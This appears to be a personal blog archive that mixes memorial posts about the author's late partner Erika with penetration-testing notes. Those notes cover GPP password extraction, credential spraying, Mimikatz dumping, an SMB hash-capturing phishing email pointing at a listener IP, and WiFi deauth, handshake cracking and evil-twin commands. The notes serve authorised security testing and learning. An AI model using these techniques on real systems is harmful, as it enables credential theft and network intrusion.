The Under(dog)

As many people also are, Erika was always a fan of the underdog, the little guy, or in our Bruins hockey world, the backup goalie. A few years ago, Anton Khudobin was the Bruins backup goalie and Erika was a big fan of his. Even though Khudobin’s play style could be a bit erratic, to the point of Erika shouting during the game with things like “What is he doing?!?” and “Get back in the net!” Smooth or efficient are not a words anyone might use to describe his style of play.

But Khudobin moved on and then the Bruins signed Jaroslav Halak to be the Bruins new backup goalie behind Tuukka Rask. Erika also became a big fan of his. I’d joke (or maybe I’m not wrong) that she is the biggest Halak fan outside of his own family. I even got her a Halak jersey to wear to Bruins games.

Erika getting ready for the Bruins first playoff game on August 15th, 2020, wearing her Jaroslav Halak jersey

Her love of Halak also goes back into 2018 when she and I attended a Bruins game together. At each game, Bruins staff always hand out a small poster before the game with one of the players on the front and stats on the back. For that game, the poster was of Jaroslav Halak. I think she got 3 or 4 of them. We got them home and they sat around for weeks, maybe months when one day I was just doing a little house cleanup and threw them away as clutter. Well, she noticed and wasn’t happy.

Fast forward to a Bruins game this year that I attended with my buddy Deane. Once getting in to the Garden, I noticed it was a special poster that night. Not the typical black and gold, but a purple one, for Hockey Fights Cancer, and whose face was on the front, none other than Jaroslav Halak. I made sure that I got multiple copies as insurance that I could get at least one home in good quality. But I didn’t tell her right away. Instead, I did this with it:

That is proudly hanging in our kitchen to this day. Also, if the name sounds familiar, it’s because Jaro Halak is also the origin of our dog’s name. In spite of Jaro being a man’s name and our dog being a female, Erika was pretty excited to give our dog her new moniker.

I guess this is a really roundabout way of starting to tell people more about Erika and how she always loved the underdog, the overlooked, and the underappreciated. For those who knew her in journalism, they know that these were her favorite stories. She loved telling the stories of students in the Baltimore schools. Or her story about Josie King, the one that earned her a Pulitzer finalist spot. Or more recently when she chose to change careers and earn a Master’s degree in Public Policy from Tufts University so she could focus on fighting climate change and working in the renewable energy field, pushing for more solar electricity. And in the last couple years, she also began to focus on racial and equity injustices. She and I both worked from home and her work day included many phone meetings. Many times I could hear her very professionally trying to explain these issues to others who just weren’t “getting it” yet. She was trying, trying so hard to fight for those who need a voice from someone like her. She understood the powers that she had, the abilities that she had and yes, the privileges that she had and she was using them. Using them for those who she wanted to help. In time, this work she started will continue. It will not stop now, there will be more from Erika Niedowski. Stay tuned.

Two Depths

I got divorced in early 2013. At that time, I felt a large part of my identity was tied to being married and to my family. I felt like a total failure. The lows I felt from that were something I’d really never felt before for such a long time.

I’m back there right now. There are similarities, but I’ve also been trying to figure out the difference between that and now. Well, the obvious that a divorce is a failure of sorts and the other person is still around. You can get angry, you can blame the other person (and yourself). But now with Erika’s passing, there’s no anger toward her. It’s all hurt. It’s all pain. It’s all emptiness. I was thinking tonight that any time I was feeling down or sad or hurt or bad about anything, I could always turn to Erika and she’d know how to make things better. We were one. I always had that trust with her that I could tell her anything, talk to her about anything, and she would always try her hardest to make it better. Multiple times in the last few days, the thought flashes in my head to talk to her. To have her make it better. To have her help me fix it. But she can’t. The person that I need most to help me feel better isn’t here. It’s a total void. Total darkness. Lost. I thought I had the right words for all of this, but I’m not sure I do yet. It’s just such an empty feeling where I’m just so used to being dependent on someone else, and she’s not here. The one person I trust that I can talk to, is not here.

I know all my gushing about Erika may seem corny and maybe unbelievable to some, but it’s really true. Most mornings, I woke up before her, sometimes by a couple hours. Multiple times, I sat around like a little kid on Christmas morning, waiting for the whole family to get up, just so I could start my daily routine with her. Just so I could see her again. We had so many little corny things that we did for each other. One that we had was every morning, we’d celebrate her simply getting out of bed. Yep, it really was that silly. When I’d see her come downstairs, I’d throw both hands in the air and cheer “Yay! You did it again! You got up!” It always made her smile. If there was a morning I forgot to do it immediately, she’d just stop and look at me and start to put her hands up as if to say “Do I get a cheer today?” Like I said, it was silly, but it was fun, and it was what we did.

Out Driving

My friend John Marion from Common Cause is collecting photos of ballot drop boxes from each town hall around the state. He needed four more, so I drove around today to get them, with Jaro. As I was driving, I saw parts of Rhode Island that I’d never seen before. I went through Smithfield, North Smithfield, through Burrillville, to Glocester and eventually Foster. As I was driving, it hit me multiple times how much fun that trip would have been with Erika and it’s exactly the type of trip that we’d do, often on the spur of the moment. On Friday wine night, I might blurt out, let’s go take those pictures for John tomorrow! And Erika would assuredly say “Ok!” and off we’d go, driving around on a Saturday morning.

The other thing that hit me about this trip is that Erika told me about how driving was stress therapy for her. She told me that when she first moved to Rhode Island back in 2012, she did a lot of it. She’d drive to all corners of the state, discovering her new home, but also doing it to clear her mind or to think about things like “What’s next?” That’s where I was today. I was wishing so hard she could have been there with me. She should have been there with me. It would have been fun together and probably another of those little things that we did that someday would be a “Remember that time we drove around taking pictures of ballot boxes for John?” Because we did that a lot. It didn’t have to be any big, momentous event for us to “Remember that time…?” It was always just more about the time we spent together and how it made us happy. It was so often the little things that made Erika, and me, happy.

Some might think the gifts that she liked best were a little bit odd, but I had a pretty good idea of what things she’d like best. This was also one of the things that I loved most about Erika is she was atypical in this way. She didn’t wear jewelry, she didn’t like fancy clothes (actually she hated them), didn’t like anything flashy. One of the best things I gave her recently that made her so happy and got her excited is just so typical. She loves the outdoors, she loves nature and all of its oddities. We’d joke that she wanted to quit her job and just be an “Outdoors-ologist.” Yeah, we made that up. She read a book about how trees can communicate with each other and then wanted to study trees. She was just starting to get into beekeeping with her little hive of Mason bees. So when I saw this thing during a recent walk in the woods with McKenna, I just knew Erika would love it. And I was right, she talked about it for days and how awesome it was. Here it is:

If you can’t tell what that is, it’s ants working. They’re hollowing out a log and there’s a pile of sawdust. That is the kind of thing that Erika just loved to see, and loved to get. It’s just another thing that made being with her so much fun.

Me ‘n’ Squeaks

Yep, Erika is Squeaks. That was my name for her for years. Why? Well, I think at one point she made some kind of high pitched sound with her mouth closed when she wanted attention or something and it sounded like a squeak to me. So I called her Squeaks once and she liked it.

I walk our dog Jaro (soft J, like Yaro) twice a day. First thing in the morning and again after dinner. It’s about a 1 mile, 20 minute walk by myself, so I have a lot of time to just think and in the last week, the entire time is just spent thinking and remembering Erika. My mind goes from the best times we had together to remembering how she looked in the hospital and on her last day. Let me just say that was heartbreaking and I hope I never have to say anything about that ever again.

I’m also trying to think of how I will eulogize her. I’ve never done one before, never wanted to, didn’t think I could hold it together to do one, but for Erika, I want to. I want everyone to know just how incredible she was. Sure, most people talk about how much they loved her, how great she was, how she lit up a room, how positive, or funny or down to earth. And all of that is 100% true, but it also doesn’t even scrape the surface of how great she really was. I always thought I knew how much of my life that she was but now that she’s gone, I realize she was so much, much more of my life.

One thing that’s really interesting about our relationship is that it actually took me years to finally feel like her equal. And that had nothing to do with how she treated me. She always treated me as at least her equal, but for a long while, I just didn’t see myself as measuring up to her. I did eventually see us as a “co-equal” couple, which made it even better between us. Made our conversations so much better when I had the confidence to challenge her on things and dig in. I’ll talk more about some of those in the future as she and I had some plans that we wanted to tell everyone at some point.

I think one thing Erika did to help me get over that feeling of not being her equal was just her reaction one time when I told her that. She seemed legitimately surprised. For some reason, that was a piece that helped me to get over it. That didn’t fix it overnight, but the fact that her reaction wasn’t “well yeah…” definitely helped.

One other thought that hit me recently while walking Jaro, and there have been a lot of these. It was one of those gut-punch thoughts about her. She had an incredible life, she did so many things that were impressive, but I think at times many of those things were stressful to her. Just in the last couple years during a quiet time, or during a pause in conversation, she’d look at me and just say “I like our life right now.” And it really was only in the last couple years she said that. We had a house together, we had our cats, our dog, we both worked from home so we saw each other constantly. And yes, I also really liked our life together right then. And that’s the gut punch of where it took us 40+ years of our lives to get to where we were both simply happy about everything in our lives, only for it to end so suddenly, so tragically, so abruptly. All gone in an instant.

Shell Types

Sometimes, I have a hard time getting my brain around certain things. One such example is a bind shell and reverse shell. After reading the Metasploit section in Georgia Weidman’s Intro to Pentesting book, it all became clear.

In short, bind shell = I connect to you. Reverse shell, you connect to me. Simple.

Since I like analogies, here goes.

Bind shell. I have your phone number (IP address) and phone extension (port number). I call you on the phone. You answer. Now I can ask you to do things for me. Pretty straightforward. Except sometimes, there’s an operator in between. “You want to talk to who? Who is this? No, I will not put you through.” Maybe the operator even tells you “I just blocked that call for you. Bad, bad people.”

Because I can’t get through the operator (aka firewall), I might ask you to call me instead. I give you my phone number (LHOST) and my extension (LHOST, often 4444). So I call you, I’m blocked, but this triggers you to call me back. Now we have an open connection where I can ask you to do things for me. This is the reverse shell.

But then some companies realize this trick and they don’t let any phones call any other phone with an extension of 4444, aka egress filtering. But it’s totally normal and expected to call people on extension 80 or 443, so I ask you to call me on one of those. The filtering sees it as normal traffic and voila, we have a shell!

Who’s Down with GPP? Yeah You Know Me!

I figured it might be good to post about things that I learn on the job. This week, I was able to get a password out of Group Policy Preferences (GPP) with Metasploit.

Here’s a great writeup by Sean Metcalf on it.

First I tried capturing and relaying hashes with Responder and NTLMRelayx, but the targets did not give local administrator access to the accounts I was relaying. (Boo!) I was able to crack some of the hashes, but that didn’t help right away. So I had to look for something else. Since I did have some working credentials, I could then fire up Metasploit and see what happens against GPP. Using the auxiliary/scanner/smb/smb_enum_gpp module, I set the RHOST for a domain controller, gave it the username and password that I had previously captured and fired away. It started listing out the policies, like Groups.xml and a nice little table popped up like:

Name Value
—- —–
TYPE Groups.xml
USERNAME Administrator (built-in)
PASSWORD xxxxxxxxxx
DOMAIN CONTROLLER 192.168.19.14
DOMAIN example.com
CHANGED 2017-01-08 16:49:50
NEVER_EXPIRES? 1
DISABLED 0

Hooray!! So what do we do with that account? Spray it! That’s a local administrator account, so maybe it’ll have access elsewhere! How do we spray it? With CrackMapExec by byt3bl33d3r! Point that at all the hosts with SMB open and see what happens.

Run: cme smb IP -u Administrator -p SuperSecretPassword –local-auth

Hey, it worked! I know it worked because of that awesome “Pwn3d!” that CME shows. Next up, Mimikatz and see what’s in memory. So same command as above, but add the -M Mimikatz to it and see what comes up. Sure enough, there’s another set of credentials in clear text! Try that against the domain controller…NOW! Using CME again, with the new creds, against a DC and you know what? Pwn3d again! We are in! But as we know, DA is only the beginning and it’s time to find the data. So that’s what I learned this week, check the GPP for passwords!

SMB Email

Not a new thing, just like most other posts, this is documentation.

If internal network access, scan with nmap for egress access, especially for port 445 and 139:

nmap -T4 -p0-65535 –max-retries 1 -sS -oA sweep_egress egadz.metasploit.com

If it’s closed, this probably isn’t going to work. If there is no access to test that, we’re flying blind and just hoping here.

Set up a listener on metasploit, I like auxiliary/server/capture/smb because it’s just so easy. Nothing to configure. Just “use” it and run.

Next, create an email for the target. In the email, include an html image tag and use file:// for the scheme. Point it to the metasploit server, and reference some non-existent image. Example: <img src=”file://192.168.1.10/image.jpg” /> This will create a broken image icon in the email, but when the user attempts to load from a Windows machine, the user’s NTLMv2 hash will be sent to the listener.

If you want to also craft a believable phishing email, you could also put a link to a web page that you control and on that web page, also include the same image tag. This is just in case the user’s mail client doesn’t allow downloading of images. But a browser will!

Once hash(es) are captured, shut down the listener and while still in metasploit, enter: creds

This will give the hashes in a format that a password cracker like hashcat will understand. For hashcat, use -m5600 for the NTLMv2 format. Also, ensure there is no extra whitespace around the hashes when loaded into hashcat, or there will be a string length exception.

Run the cracker and pray. If it cracks, congrats! If not in the time allotted, sorry!

Create Screenshot Directory

Each week, I create a new directory for the test. It’s where I store notes, reports, artifacts, etc. I also create a screenshot directory and then set my system to auto-save screenshots to there. So I bash scripted it up. Here’s the script that will automatically create the new directory, the screenshot directory and tell my Mac system to save screenshots there:

#!/bin/bash

if [ “$1” == “” ]
then
echo “Usage: ./myscreens.sh [dirname]”
else
mkdir ~/Desktop/$1
mkdir ~/Desktop/jobs/$1/screens
defaults write com.apple.screencapture location ~/Desktop/$1/screens
killall SystemUIServer
fi

Doing a Wireless Penetration Test

Make sure you have everything you’ll need, since these always need to be on-site.

Computer (even better to bring more than 1), with Kali Linux installed
Power cords
WiFi Card(s) – at least 1 since they don’t like to work when they need to
Different antennas
MiFi, since they’re probably not going to let you on the network so easily
USB Hub, as the wireless card might need extra power
OEM power cords
Power strip – there’s a lot to plug in

That’s a good start.

Thanks to Ted Raffle for this writeup.

Start up Kali, plug in the card, run iwconfig to see whether it is connected

Get rid of unnecessary processes: airmon-ng check kill

Start the interface: airmon-ng start wlan0

To see networks and their MAC: airodump-ng –band abg -cswitch 1 wlan0mon

If you need to de-auth: aireplay-ng –deauth <number of packets or 0 for infinite> -a [MAC of AP] -c [MAC of client] wlan0mon

Capture a PSK: airodump-ng wlan0mon -c 1 –bssid [MAC of AP] –write <filename>

Turn handshake value into a hashcat value: wpaclean clean.cap <filename>-01.cap

And: aircrack-ng clean.cap -J hccap

hashcat -m 2500 hccap.hccap -w wordlist rules/rule

Evil Twin:

Have mana installed

Use Nick Sanzotta’s “manaSucks” script:

python manaSucks.py -iwlan0mon -m=<fake MAC address> –hostname ‘anything’ -s<SSID> -c6 –manaloud=0

For brute forcing the EAP network, get usernames, either also from Nick Sanzotta’s WiFiSuite, or from evil twin, or from scraping, use WiFiSuite:

python wifisuite.py -iwlan0mon -s”<SSID>” -u <username file> -p<password> spray

If you get guest network access, test for network segmentation. nmap the neighborhood looking for “up” hosts. If there are any, nmap them for services. Also check for nameservers.

If you get on the corporate network with credentials, it’s essentially now an internal assessment. Pick something to show risk and move on. After all, it’s a wireless assessment.

Test outside the building for access

Plug in a wifi repeater/AP, is it detected? Are there network access controls? (Probably not, and now you have internal access)

Getting Organized

Learning how to get organized and put things in the proper place. I suspect that I’ll come back and add things like naming conventions. But this is what I got so far for organizing the information gathered during a pen test, in a directory.

Customer name

screenshots
services
scans
- nexpose|appscan
- nmap
  - xml
  - gnmap
  - nmap
- pings
- enum

As few nmap scans as possible, and name them after the network or if there is something else that makes sense. So the files may be named 192.168.10.10.gnnmap and so on.
Ping files are named the same way, but are prefixed with ping-
enum files are for enumerating a domain controller. These are prefixed with enum- and end with -dc
Services are IP addresses and the file is named with the service-host
All data is immediately removed and encrypted off the machine and deleted as soon as reasonably possible.

Patrick Laverty

Learn it, do it, share it. Trying all three every day.